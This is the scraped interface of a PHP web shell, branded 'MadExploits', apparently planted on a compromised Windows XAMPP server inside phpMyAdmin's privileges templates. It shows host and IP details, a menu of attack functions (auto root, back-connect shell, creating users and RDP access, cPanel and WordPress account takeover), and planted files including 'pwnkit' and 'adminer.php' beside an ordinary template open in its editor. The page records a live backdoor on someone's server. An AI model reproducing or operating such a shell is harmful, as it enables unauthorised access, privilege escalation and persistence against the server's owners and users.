Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 216.73.216.172
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
phpMyAdmin /
templates /
server /
privileges /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-rw-rw-
add_user.twig
1.35
KB
-rw-rw-rw-
add_user_fieldset.twig
487
B
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
change_password.twig
3.36
KB
-rw-rw-rw-
choose_user_group.twig
550
B
-rw-rw-rw-
edit_routine_privileges.twig
3.88
KB
-rw-rw-rw-
get_user_link.twig
292
B
-rw-rw-rw-
initials_row.twig
1008
B
-rw-rw-rw-
login_information_fields.twig
4.8
KB
-rw-rw-rw-
new_user_ajax.twig
1.64
KB
-rw-rw-rw-
privileges_summary.twig
4.63
KB
-rw-rw-rw-
privileges_table.twig
33.57
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
subnav.twig
534
B
-rw-rw-rw-
user_overview.twig
749
B
-rw-rw-rw-
user_properties.twig
4.81
KB
-rw-rw-rw-
users_overview.twig
7.79
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : initials_row.twig
<nav aria-label="{% trans 'Pagination of user accounts' %}"> <ul id="userAccountsPagination" class="pagination"> {% for tmp_initial, initial_was_found in array_initials %} {% if tmp_initial is not same as(null) %} {% if initial_was_found %} <li class="page-item{{ initial is same as(tmp_initial) ? ' active' }}"{{ initial is same as(tmp_initial) ? ' aria-current="page"' }}> <a class="page-link" href="{{ url('/server/privileges', {'viewing_mode': viewing_mode, 'initial': tmp_initial}) }}">{{ tmp_initial }}</a> </li> {% else %} <li class="page-item disabled"> <a class="page-link" href="#" tabindex="-1" aria-disabled="true">{{ tmp_initial }}</a> </li> {% endif %} {% endif %} {% endfor %} <li class="page-item"> <a class="page-link text-nowrap" href="{{ url('/server/privileges', {'viewing_mode': viewing_mode, 'showall': true}) }}">{% trans 'Show all' %}</a> </li> </ul> </nav>
Close